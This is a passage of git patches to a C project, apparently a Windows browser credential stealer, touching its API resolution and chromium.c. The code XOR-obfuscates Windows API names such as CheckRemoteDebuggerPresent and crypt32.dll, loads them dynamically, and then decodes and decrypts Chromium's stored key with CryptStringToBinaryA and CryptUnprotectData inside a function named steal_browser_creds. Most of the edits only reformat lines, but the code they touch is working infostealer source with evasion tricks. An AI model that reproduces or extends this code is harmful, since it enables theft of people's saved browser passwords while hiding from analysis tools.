+35,49 @@ void resolve_apis(hidden_apis *apis) { HMODULE hKernel32 = GetModuleHandleW(kernel_str); - // Resolve strings char checkRemoteDbg_str[] = "\x69\x42\x4f\x49\x41\x78\x4f\x47\x45\x5e\x4f\x6e\x4f\x48\x5f\x4d\x4d\x4f" "\x58\x7a\x58\x4f\x59\x4f\x44\x5e"; // CheckRemoteDebuggerPresent XOR_STR(checkRemoteDbg_str, strlen(checkRemoteDbg_str)); - wchar_t crypt32_str[] = L"\x49\x58\x53\x5a\x5e\x19\x18\x04\x4e\x46\x46"; // crypt32.dll - XOR_WSTR(crypt32_str, wcslen(crypt32_str)); - HMODULE hCrypt32 = LoadLibraryW(crypt32_str); - + wchar_t crypt32_str[] = + L"\x49\x58\x53\x5a\x5e\x19\x18\x04\x4e\x46\x46"; // crypt32.dll + XOR_WSTR(crypt32_str, wcslen(crypt32_str)); + HMODULE hCrypt32 = LoadLibraryW(crypt32_str); - // Resolve functions in crypt32.dll - char cryptUnprotectData_str[] = "\x69\x58\x53\x5a\x5e\x7f\x44\x5a\x58\x45\x5e\x4f\x49\x5e\x6e\x4b\x5e\x4b"; + // Resolve functions in crypt32.dll + char cryptUnprotectData_str[] = + "\x69\x58\x53\x5a\x5e\x7f\x44\x5a\x58\x45\x5e\x4f\x49\x5e\x6e\x4b\x5e" + "\x4b"; XOR_STR(cryptUnprotectData_str, strlen(cryptUnprotectData_str)); - char cryptStringToBinaryA_str[] = "\x69\x58\x53\x5a\x5e\x79\x5e\x58\x43\x44\x4d\x7e\x45\x68\x43\x44\x4b\x58\x53\x6b"; + char cryptStringToBinaryA_str[] = + "\x69\x58\x53\x5a\x5e\x79\x5e\x58\x43\x44\x4d\x7e\x45\x68\x43\x44\x4b\x58" + "\x53\x6b"; XOR_STR(cryptStringToBinaryA_str, strlen(cryptStringToBinaryA_str)); - apis->funcCryptUnprotectData = (PCryptUnprotectData)GetProcAddress(hCrypt32, cryptUnprotectData_str); - - - apis->funcCryptStringToBinaryA = (PCryptStringToBinaryA)GetProcAddress(hCrypt32, cryptStringToBinaryA_str); + apis->funcCryptUnprotectData = + (PCryptUnprotectData)GetProcAddress(hCrypt32, cryptUnprotectData_str); + apis->funcCryptStringToBinaryA = + (PCryptStringToBinaryA)GetProcAddress(hCrypt32, cryptStringToBinaryA_str); - // Resolve functions in kernel32.dll + // Resolve functions in kernel32.dll apis->funcCheckRemoteDebuggerPresent = (PCheckRemoteDebuggerPresent)GetProcAddress(hKernel32, checkRemoteDbg_str); - /*char loadLibA_str[] = "\x66\x45\x4b\x4e\x66\x43\x48\x58\x4b\x58\x53\x6b"; - XOR_STR(loadLibA_str, strlen(loadLibA_str)); - char SHGetKnownFolderPath_str[] = - "\x79\x62\x6d\x4f\x5e\x61\x44\x45\x5d\x44\x6c\x45\x46\x4e\x4f\x58\x7a\x4b" - "\x5e\x42"; - XOR_STR(SHGetKnownFolderPath_str, strlen(SHGetKnownFolderPath_str));*/ - //apis->funcLoadLibraryA = - //(PLoadLibraryA)GetProcAddress(hKernel32, loadLibA_str); + /*char loadLibA_str[] = "\x66\x45\x4b\x4e\x66\x43\x48\x58\x4b\x58\x53\x6b"; +XOR_STR(loadLibA_str, strlen(loadLibA_str)); +char SHGetKnownFolderPath_str[] = + "\x79\x62\x6d\x4f\x5e\x61\x44\x45\x5d\x44\x6c\x45\x46\x4e\x4f\x58\x7a\x4b" + "\x5e\x42"; +XOR_STR(SHGetKnownFolderPath_str, strlen(SHGetKnownFolderPath_str));*/ + // apis->funcLoadLibraryA = + //(PLoadLibraryA)GetProcAddress(hKernel32, loadLibA_str); // apis->funcSHGetKnownFolderPath = (PSHGetKnownFolderPath)GetProcAddress( // hKernel32, SHGetKnownFolderPath_str); } From 97da530f6d8991c9b6727c171fd060420449d8da Mon Sep 17 00:00:00 2001 From: ErrorTeaPot <98967114+ErrorTeaPot@users.noreply.github.com> Date: Fri, 4 Apr 2025 11:47:36 +0200 Subject: [PATCH 11/11] Update chromium.c --- src/chromium.c | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/src/chromium.c b/src/chromium.c index 2b33ab6..d04cb57 100644 --- a/src/chromium.c +++ b/src/chromium.c @@ -5,6 +5,7 @@ // clang-format on #include "chromium.h" + #include #include #include @@ -134,8 +135,8 @@ static int decode_key(PSTR encodedKey, BYTE *decodedKeyOut[], // Decode the encoded key, this leaves us with an AES-GCM encrypted key if (!apis->funcCryptStringToBinaryA(encodedKey, 0, CRYPT_STRING_BASE64, - decodedBinaryData, &decodedBinarySize, NULL, - NULL)) { + decodedBinaryData, &decodedBinarySize, + NULL, NULL)) { #ifdef DEBUG fprintf(stderr, "Failed decoding base64. Error code: %lu\n", GetLastError()); @@ -174,7 +175,8 @@ static int decrypt_key(BYTE encryptedKey[], size_t encryptedKeySize, DataInput.cbData = (DWORD)encryptedKeySize; DataInput.pbData = encryptedKey; - if (!apis->funcCryptUnprotectData(&DataInput, NULL, NULL, NULL, NULL, 0, &DataOutput)) { + if (!apis->funcCryptUnprotectData(&DataInput, NULL, NULL, NULL, NULL, 0, + &DataOutput)) { #ifdef DEBUG fprintf(stderr, "Failed decrypting key. Error code: %lu\n", GetLastError()); #endif @@ -252,16 +254,16 @@ static int steal_browser_creds(BrowserInfo browser, Credential *credTab, size_t encryptedKeySize = 0; BYTE *encryptedKey; - if (decode_key(encodedKey, &encryptedKey, &encryptedKeySize,&apis) != + if (decode_key(encodedKey, &encryptedKey, &encryptedKeySize, &apis) != EXIT_SUCCESS) { #ifdef DEBUG printf("Could not decode %ls\n", encodedKey); #endif return EXIT_FAILURE; } - + DATA_BLOB decryptedBlob; - if (decrypt_key(encryptedKey, encryptedKeySize, &decryptedBlob,&apis) != + if (decrypt_key(encryptedKey, encryptedKeySize, &decryptedBlob, &apis) != EXIT_SUCCESS) { #ifdef DEBUG fprintf(stderr, "Could not decrypt key\n");